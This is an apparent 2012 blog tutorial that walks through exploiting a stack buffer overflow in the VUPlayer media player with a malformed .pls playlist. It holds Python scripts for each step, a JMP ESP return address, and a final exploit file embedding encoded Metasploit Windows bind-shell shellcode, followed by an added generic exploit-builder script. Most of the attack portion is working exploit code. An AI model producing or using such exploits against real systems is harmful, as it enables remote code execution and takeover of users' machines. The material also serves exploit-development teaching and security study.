Tuesday, 14 February 2012

Buffer Overflow Exploits - VUPlayer

This article walks through everything I did to exploit VUPlayer. First I installed VUPlayer in a VirtualBox VM; once the install finished I opened VUPlayer to get familiar with the application.




Next I checked which file types VUPlayer can open.


From that image I learned that VUPlayer loads playlist files with the extensions .m3u, .pls, .vpl, .wax and .cue. That is the input I decided to attack: a malformed playlist file. As a first test I had VUPlayer open a playlist containing 10,000 'A' characters (0x41). I generated the file with Python:

#!/usr/bin/python
# Write 10,000 'A' bytes (0x41) into a playlist file to see whether VUPlayer
# crashes on an oversized entry.
filename = "hajar.pls"
hancur = b"\x41" * 10000
with open(filename, "wb") as f:   # binary mode so the bytes are written unchanged
    f.write(hancur)
print("written")

Running the script creates the playlist file hajar.pls (Python scripts are run, not compiled). I then opened VUPlayer and loaded the file.



What happened? VUPlayer closed, which suggests a buffer overflow. To see exactly what went wrong I started VUPlayer under OllyDbg and opened the same playlist of 10,000 'A' characters. The result looks like this:



The register window shows EIP set to 0x41414141 and ESP pointing into a region of the stack filled with 'A' bytes: the return address was overwritten, and part of our input sits at the top of the stack. To find which position in the input lands in EIP and which position ESP points to, I built a non-repeating string with pattern_create from Metasploit (the length must be at least as long as the crashing buffer; a 4-byte sequence in that pattern occurs only once, so the value in EIP identifies its offset).




Then I wrote that pattern into a playlist file with Python:


#!/usr/bin/python
# Write the pattern_create output into the playlist; the unique 4-byte
# sequence that ends up in EIP tells us the offset of the return address.
filename = "hajar.pls"
hancur = (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac"
          b"0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
          b"3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7"
          b"Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2A"
          b"j3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
          b"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao"
          b"1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3A"
          b"q4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As"
          b"8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av"
          b"3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax"
          b"6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0"
          b"Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3"
          # ........................ (the rest of the pattern_create output is truncated on the page)
          )
with open(filename, "wb") as f:
    f.write(hancur)
print("written")

Then I ran the script and opened the resulting playlist in VUPlayer under OllyDbg.

OllyDbg shows EIP and the data at ESP overwritten with bytes from the pattern. To find where in the pattern those bytes sit, I gave the value in EIP (and the first four bytes at ESP) to pattern_offset:
pattern_offset reports that the bytes overwriting EIP are at offset 1012 and the bytes ESP points to start at offset 1016.
To confirm that 1012 really is the EIP offset, I built a playlist with exactly 1012 filler bytes followed by four marker bytes:
 
#!/usr/bin/python
# 1012 filler bytes, then 4 marker bytes that should land in EIP.
filename = "hajar.pls"
hancur = b"\x90" * 1012
hancur += b"\xAA\xBB\xCC\xDD"   # x86 is little-endian, so EIP should read 0xDDCCBBAA
with open(filename, "wb") as f:
    f.write(hancur)
print("written")

Then I ran the script and opened that playlist in VUPlayer under OllyDbg.

OllyDbg shows EIP = DDCCBBAA, the marker bytes from the playlist read little-endian, so the EIP offset of 1012 is correct. Next I checked how much of the stack after the return address I control, because that is where the payload has to go. I built the playlist as follows:

#!/usr/bin/python
# Marker bytes in EIP, then fill the stack past offset 1016 with 0xCC (INT3)
# up to 2000 bytes to see how much of the buffer after ESP we control.
filename = "hajar.pls"
hancur = b"\x90" * 1012
hancur += b"\xAA\xBB\xCC\xDD"
hancur += b"\x90" * (1016 - len(hancur))   # adds nothing here (1012 + 4 == 1016); kept to show the layout
hancur += b"\xCC" * (2000 - len(hancur))   # was written as '\CC' on the page, which is not a byte escape
with open(filename, "wb") as f:
    f.write(hancur)
print("written")

Then I ran the script and opened that playlist in VUPlayer under OllyDbg.

OllyDbg shows the stack from ESP onward filled with our 0xCC bytes, so there is room for a payload there.

We cannot hard-code a stack address into EIP, because the exact stack address is not reliable from run to run. Instead I point EIP at a JMP ESP instruction inside a loaded module: when it executes, control lands on the data ESP points to, which is our buffer just past the return address. In OllyDbg, open View -> Executable modules, double-click shell32.dll, then right-click in the disassembly -> Search for -> Command and enter JMP ESP.

I found a JMP ESP at 7C9D30D7. This address is specific to the shell32.dll build on the test VM; on another Windows build it has to be looked up again, and the technique relies on shell32.dll loading at a fixed address and on the stack being executable.

Next I generated the payload with the Metasploit Framework:

In the payload generator, filter on win32, choose the Windows bind shell payload, fill in the options as shown below:

and press Generate payload:


Then I built the final playlist with Python: 1012 filler bytes, the JMP ESP address (little-endian), a short NOP pad, and the generated payload.

#!/usr/bin/python
# Final playlist: [1012 x NOP][JMP ESP address, little-endian][16 x NOP][bind shell payload]
filename = "hajarlah.pls"
hancur = b"\x90" * 1012
hancur += b"\xD7\x30\x9D\x7C"   # 0x7C9D30D7: JMP ESP in shell32.dll on the test VM
hancur += b"\x90" * 16          # NOP pad; ESP points here after the jump
# Windows bind shell generated by Metasploit (encoded):
hancur += (b"\x33\xc9\xdb\xd4\xba\xaf\x6f\x52\x6f\xb1\x51\xd9\x74\x24\xf4\x5b"
b"\x31\x53\x15\x03\x53\x15\x83\x6c\x6b\xb0\x9a\x8e\x1e\xdf\x28\x86"
b"\x26\xe0\x4c\xa9\xb9\x94\xdf\x71\x1e\x20\x5a\x45\xd5\x4a\x60\xcd"
b"\xe8\x5d\xe1\x62\xf3\x2a\xa9\x5c\x02\xc6\x1f\x17\x30\x93\xa1\xc9"
b"\x08\x63\x38\xb9\xef\xa3\x4f\xc6\x2e\xe9\xbd\xc9\x72\x05\x49\xf2"
b"\x26\xfe\x9a\x71\x22\x75\x85\x5d\xad\x61\x5c\x16\xa1\x3e\x2a\x77"
b"\xa6\xc1\xc7\x84\xfa\x4a\x9e\xe6\x26\x51\xc0\x35\x17\xb2\x66\x32"
b"\x1b\x74\xec\x04\x90\xff\x82\x98\x05\x74\x22\xa8\x0b\xe3\x2d\xe6"
b"\xbd\x1f\x61\x09\x17\xb9\xd1\x93\xf0\x75\xe4\x33\x76\x09\x3a\x9c"
b"\x2c\x12\xea\x4a\x06\x01\xf7\xb1\xc8\x25\xde\x9a\x61\x3c\xb9\xa5"
b"\x9f\xb7\x44\xf0\x35\xca\xb7\x2a\xa1\x13\x4e\x3f\x9f\xf3\xae\x69"
b"\xb3\xa8\x03\xc6\x67\x0c\xf7\xab\xd4\x6d\x27\x4d\xb3\x84\x7b\xf7"
b"\x10\x2e\x9a\x62\xfe\x94\x47\xfc\x38\x83\x88\x2a\xac\x3c\x26\x87"
b"\xce\xed\xa0\x83\x9c\x20\xd8\x9c\x21\xea\x49\x77\x21\xc3\x06\x92"
b"\x94\x62\x9f\x0b\xd8\xbd\x70\xe7\x72\x17\x8e\xd7\xe8\xff\x97\xae"
b"\xc8\x79\x0f\xaf\x03\x2c\x50\x9f\xca\xa5\xca\x79\x7b\x59\x7e\x0c"
b"\x9e\xf7\xd0\x57\x48\xc4\x58\x80\xe0\x90\xd3\xac\xc4\xd8\x17\x9a"
b"\xd9\x9b\xfa\x24\x67\x30\x96\x55\x12\x70\x33\xce\x48\xe8\x31\xee"
b"\x3c\xff\x4a\x7b\x07\xff\x63\xd8\xd0\xad\xda\x8f\x8f\x3b\xdc\x7e"
b"\x61\xe9\x8f\x7f\x51\x79\x9d\xa6\x57\xb4\x8e\xa7\x8e\x22\xce\xa8"
b"\x18\x4c\xe0\xdd\x30\x4e\x82\x25\xda\x51\x53\xf7\xdc\x7e\x34\x89"
b"\xfa\x9d\xb6\x26\x04\xb7\xc6\x18")
with open(filename, "wb") as f:
    f.write(hancur)
print("written")

Then I ran the script and opened that playlist in VUPlayer, this time without the debugger.

VUPlayer appears to crash, but the bind shell is now listening on the target. From a terminal on BackTrack I connected to it with telnet:
 

I successfully got a Windows directory listing from BackTrack.
Finished.
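The whole procedure above (pattern, offset, then the final layout) in one script, as an added example that is not part of the original post. It reimplements the two Metasploit helpers the post uses, pattern_create.rb and pattern_offset.rb, and assembles the playlist in the same layout as the final script: NOP sled up to the EIP offset, the return address little-endian, a NOP pad, then the payload. The offsets 1012 and 1016 and the JMP ESP address 0x7C9D30D7 are the values from the post; the bad-character set (NUL, CR, LF) is an assumption for a text playlist parser, which the post does not discuss, and the payload used in the demo is a constructed stand-in, not the generated bind shell. The EIP value 0x68423768 is what the pattern holds at offset 1012 (computed, not quoted from the post's screenshot).

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def cyclic_pattern(length):
    """Same sequence as pattern_create.rb: Aa0Aa1...Aa9Ab0...Az9Ba0...
    Every 4-byte window is unique, so a register value maps to one offset."""
    out = []
    total = 0
    for u in UPPER:
        for lo in LOWER:
            for d in DIGIT:
                out.append(u + lo + d)
                total += 3
                if total >= length:
                    return "".join(out)[:length]
    raise ValueError("length exceeds the 20280-byte unique pattern")


def pattern_offset(pattern, value):
    """Offset of a 4-byte value in the pattern, as pattern_offset.rb does.
    `value` is either the bytes seen in the buffer, or the register value as
    an int, which is unpacked little-endian (x86) before searching."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii")
    elif isinstance(value, bytes):
        needle = value.decode("ascii")
    else:
        needle = value
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern")
    return idx


def find_bad_chars(data, bad=b"\x00\x0a\x0d"):
    """Bytes that would truncate or corrupt the buffer before it reaches the
    overflow. Assumption: NUL and CR/LF for a text playlist parser; the post
    does not cover bad characters, so verify on the target."""
    return sorted(set(b for b in data if b in bad))


def build_pls(eip_offset, ret_addr, payload, nop_pad=16, nop=b"\x90"):
    """Assemble the playlist bytes in the post's layout:
    [NOP sled][ret addr LE][NOP pad][payload]."""
    ret = struct.pack("<I", ret_addr)
    bad = find_bad_chars(ret + payload)
    if bad:
        raise ValueError("return address or payload contains bad characters: %r" % bad)
    return nop * eip_offset + ret + nop * nop_pad + payload


if __name__ == "__main__":
    # Step 1: playlist holding the cyclic pattern (2000 bytes, like the 0xCC test).
    pat = cyclic_pattern(2000)
    with open("pattern.pls", "wb") as f:
        f.write(pat.encode("ascii"))
    # Step 2: feed the register values from the debugger back in.
    # With EIP overwritten at offset 1012 the debugger shows EIP = 0x68423768
    # ('h7Bh' read little-endian); the bytes at ESP would read '8Bh9'.
    print("EIP offset:", pattern_offset(pat, 0x68423768))   # 1012
    print("ESP offset:", pattern_offset(pat, b"8Bh9"))      # 1016
    # Step 3: final file with a constructed stand-in payload (INT3 breakpoints)
    # in place of the Metasploit bind shell.
    payload = b"\xcc" * 32
    exploit = build_pls(1012, 0x7C9D30D7, payload)
    with open("hajarlah.pls", "wb") as f:
        f.write(exploit)
```

If the parser does stop at a newline or NUL, the overflow never happens, so running find_bad_chars over the generated shellcode (and over the return address bytes) before writing the file saves a debugging session; Metasploit's encoder can be told to avoid those bytes when generating the payload.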
